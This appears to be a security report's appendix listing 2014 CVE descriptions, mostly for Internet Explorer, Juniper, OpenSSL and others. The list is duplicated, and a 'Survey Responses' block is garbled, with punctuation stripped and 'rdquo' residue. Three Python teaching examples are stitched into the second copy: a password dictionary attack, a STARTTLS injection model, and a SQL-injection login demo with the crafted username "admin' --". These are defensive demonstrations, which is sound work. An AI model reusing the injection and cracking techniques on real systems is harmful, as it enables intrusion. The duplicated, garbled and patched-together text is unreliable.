CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."
CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster - Page 24 of 28
CVE-2014-2791
Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808
Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821
Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444
The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489
lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
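The CVE-2014-3489 entry says a hard-coded salt "makes it easier" to guess passwords; the following added example (constructed for this report, not CloudForms code) makes that concrete by counting the attacker's hash computations. The user list, wordlist, the salt value and the choice of PBKDF2-HMAC-SHA256 are all assumptions made for the demonstration.

```python
"""Why a hard-coded salt weakens password storage (constructed example; not
CloudForms code). Attacker cost is measured in hash computations: with one
shared salt, a wordlist hashed once is reusable against every stored hash;
with a per-user random salt, the wordlist must be re-hashed for each user."""

import hashlib
import os

ITERATIONS = 1_000                     # deliberately low so the demo runs quickly
HARD_CODED_SALT = b"demo-fixed-salt"   # hypothetical stand-in for a salt baked into source

# Constructed sample data: three accounts and an attacker's small wordlist.
USERS = {"alice": "letmein", "bob": "Summer2014", "carol": "hunter42"}
WORDLIST = ["password", "letmein", "Summer2014", "qwerty"]


def derive(password: str, salt: bytes) -> bytes:
    """Password hash; PBKDF2-HMAC-SHA256 stands in for whatever a product uses."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def store_with_hard_coded_salt(users: dict) -> dict:
    """Vulnerable pattern: every user shares the same salt."""
    return {u: (HARD_CODED_SALT, derive(p, HARD_CODED_SALT)) for u, p in users.items()}


def store_with_random_salt(users: dict) -> dict:
    """Fixed pattern: a fresh random salt for every stored hash."""
    store = {}
    for u, p in users.items():
        salt = os.urandom(16)
        store[u] = (salt, derive(p, salt))
    return store


def dictionary_attack(store: dict, wordlist: list) -> tuple:
    """Offline guessing against a leaked store.

    Returns ({user: recovered_password}, hash_computations). The attacker builds
    one lookup table per distinct salt, so a shared salt means one table serves
    every account.
    """
    tables = {}        # salt -> {digest: word}
    recovered = {}
    work = 0
    for user, (salt, digest) in store.items():
        if salt not in tables:
            tables[salt] = {}
            for word in wordlist:
                tables[salt][derive(word, salt)] = word
                work += 1
        if digest in tables[salt]:
            recovered[user] = tables[salt][digest]
    return recovered, work


if __name__ == "__main__":
    for name, builder in (("hard-coded salt", store_with_hard_coded_salt),
                          ("random salt", store_with_random_salt)):
        found, work = dictionary_attack(builder(USERS), WORDLIST)
        print(f"{name}: {len(found)} of {len(USERS)} passwords recovered "
              f"with {work} hash computations")
```

Both stores give up the same two weak passwords, but the shared-salt store costs the attacker one pass over the wordlist regardless of how many accounts leaked, while per-user salts multiply the work by the number of accounts.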
CVE-2014-3507
Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556
The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
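The CVE-2014-3556 entry describes the mechanism in one clause: a cleartext command that is processed after TLS is in place. The following added example, written for this report and not taken from nginx, models the server's command buffer so the flaw and its fix can be run side by side. The command names, the buffer model and the single-segment injection are assumptions for the demonstration; a real server would also perform the TLS handshake where the model simply flips a flag.

```python
"""Model of the STARTTLS buffering flaw (constructed example; not nginx code).

The server reads commands from a socket buffer. If a man-in-the-middle appends
a command to the client's plaintext STARTTLS line in the same TCP segment, a
server that keeps draining that buffer after the TLS handshake executes the
attacker's command inside the encrypted, authenticated session. The fix is to
discard whatever is still buffered from the plaintext phase when STARTTLS is
accepted."""

from dataclasses import dataclass, field
from typing import List, Tuple


@dataclass
class SmtpServerModel:
    discard_buffer_on_starttls: bool
    tls_active: bool = False
    buffer: bytes = b""
    # Every processed command, tagged with the channel it was executed on.
    executed: List[Tuple[str, str]] = field(default_factory=list)

    def feed(self, data: bytes) -> None:
        """Bytes arriving from the network (decrypted by TLS once it is active)."""
        self.buffer += data
        self._drain()

    def _drain(self) -> None:
        while b"\r\n" in self.buffer:
            line, _, self.buffer = self.buffer.partition(b"\r\n")
            command = line.decode("ascii", "replace").strip()
            channel = "tls" if self.tls_active else "plain"
            self.executed.append((channel, command))
            if command.upper() == "STARTTLS" and not self.tls_active:
                self.tls_active = True
                if self.discard_buffer_on_starttls:
                    # Anything already read arrived before TLS existed and
                    # cannot be attributed to the TLS peer. Drop it.
                    self.buffer = b""
                # A real server performs the handshake here; processing resumes
                # when the next (now decrypted) bytes arrive.
                return


def run_session(discard_buffer_on_starttls: bool) -> List[Tuple[str, str]]:
    """One SMTP session with an injected plaintext command; returns what ran."""
    server = SmtpServerModel(discard_buffer_on_starttls)
    # Constructed segment as received by the server: the client's two plaintext
    # commands with "RSET" appended by a man-in-the-middle (any command could
    # stand in its place).
    server.feed(b"EHLO client.example\r\nSTARTTLS\r\nRSET\r\n")
    # After the handshake the genuine client speaks over TLS.
    server.feed(b"EHLO client.example\r\n")
    return server.executed


if __name__ == "__main__":
    print("vulnerable:", run_session(False))
    print("fixed:     ", run_session(True))
```

In the vulnerable run the appended RSET is executed with the "tls" tag, that is, as if the authenticated client had sent it; in the fixed run it never executes. The same check applies to any protocol with an opportunistic upgrade (IMAP, POP3, FTP AUTH TLS): flush the plaintext read buffer at the moment of the switch.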
CVE-2014-3580
The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814
The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819
Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872
Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
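CVE-2014-3872 is the only injection flaw in the sample, and the description names only the two parameters. The following added example (constructed for this report; the device's firmware, database and schema are not on the page and nothing here is taken from them) shows the general pattern behind a login-page SQL injection: a credential check that splices the username into the query text, next to the parameterised form that closes the hole.

```python
"""Login check vulnerable to SQL injection beside its parameterised form
(constructed example on an in-memory SQLite table; not the D-Link firmware).
The account, the table layout and the clear-text password column are
assumptions chosen to keep the example focused on query construction; a real
application would store a salted hash, not the password."""

import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed admin table with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admins VALUES ('admin', 'correct horse battery staple')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """User input is spliced into the SQL text, so a quote or comment marker in
    the username or password changes what the query means."""
    query = ("SELECT COUNT(*) FROM admins WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: input travels as data and is never parsed as SQL."""
    query = "SELECT COUNT(*) FROM admins WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def demo() -> dict:
    """Run both checks with genuine credentials and with a crafted username."""
    conn = make_db()
    # Closes the string literal and comments out the password comparison.
    crafted_user = "admin' --"
    return {
        "vulnerable_real_creds": login_vulnerable(conn, "admin", "correct horse battery staple"),
        "vulnerable_injection": login_vulnerable(conn, crafted_user, "anything"),
        "safe_real_creds": login_safe(conn, "admin", "correct horse battery staple"),
        "safe_injection": login_safe(conn, crafted_user, "anything"),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {'logged in' if result else 'rejected'}")
```

The parameterised version rejects the crafted username because the whole string, quote and comment marker included, is compared as a literal value. For embedded devices that cannot be patched, the practical mitigation this report's controls point to is keeping the administration interface off the internet-facing side of the boundary firewall.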
CVE-2014-4044
OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114
Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141
Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481
Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617
The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631
RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528
The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040
GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105
IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136
IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164
IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363
vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378
Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487
